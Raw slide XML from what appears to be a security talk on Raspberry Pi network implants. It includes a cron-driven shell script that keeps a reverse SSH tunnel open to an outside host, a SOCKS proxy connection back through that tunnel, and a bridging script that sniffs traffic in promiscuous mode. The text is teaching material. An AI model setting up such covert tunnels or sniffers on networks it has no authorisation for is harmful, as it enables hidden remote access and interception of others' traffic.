              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autossh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” on the Raspberry Pi with the contents on the next slide and set it as executable with:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 755 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autossh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2144579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Autossh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="7543800" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># Based on http://www.brandonhutchinson.com/ssh_tunnelling.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># $REMOTE_HOST is the name of the remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>REMOTE_HOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>home.irongeek.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># Setting my username for home box, you will most likely want to change this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>USER_NAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># $REMOTE_PORT is the remote port number that will be used to tunnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># back to this system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>REMOTE_PORT=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1974</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># $COMMAND is the command used to create the reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> tunnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>COMMAND="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -q -N -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># Is the tunnel up? Perform two tests:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># 1. Check for relevant process ($COMMAND)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>pgrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -f -x "$COMMAND" &gt; /dev/null 2&gt;&amp;1 || $COMMAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t># 2. Test tunnel by looking at "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>" output on $REMOTE_HOST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> $REMOTE_HOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -an | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>egrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> "tcp.*:$REMOTE_PORT.*LISTEN" \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>   &gt; /dev/null 2&gt;&amp;1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>if [ $? -ne 0 ] ; then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -f -x "$COMMAND"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>   $COMMAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224244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Reverse SSH Automatic Script</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3. Use the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” command to schedule the script to run every 5 min. The entry will be something like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	*/5 * * * * /home/pi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autossh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2407316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SSH Automatic Script</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4. Go to your home PC and use the command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh –D 1080 -p 1974 pi@localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		To log into your waiting connection. Use port 1080 on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for tools that will work with a SOCKS proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1653261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Etherlogger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0842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Add USB Ethernet Adapter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://www.irongeek.com/images/raspberrypi/etherlo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509565" cy="404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89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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ome Packages and Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2133600"/>
            <a:ext cx="8229600" cy="2514599"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> apt-get install bridge-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>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tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> startbridgeandlog.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1"/>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5262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 get into this?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Has a bunch of unused </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jetdirects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wondered if the could be repurposed? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not so easy it seem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VxWorks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Linux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733800"/>
            <a:ext cx="4359651" cy="1990907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1699588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Logging Script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="44196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a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Change settings below to match network</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eth_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="192.168.1.199" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eth_netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="255.255.255.0"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eth_broadcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="192.168.1.255"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addbr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybridge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybridge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eth0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mybridge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eth1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eth0 0.0.0.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>promisc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> up</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
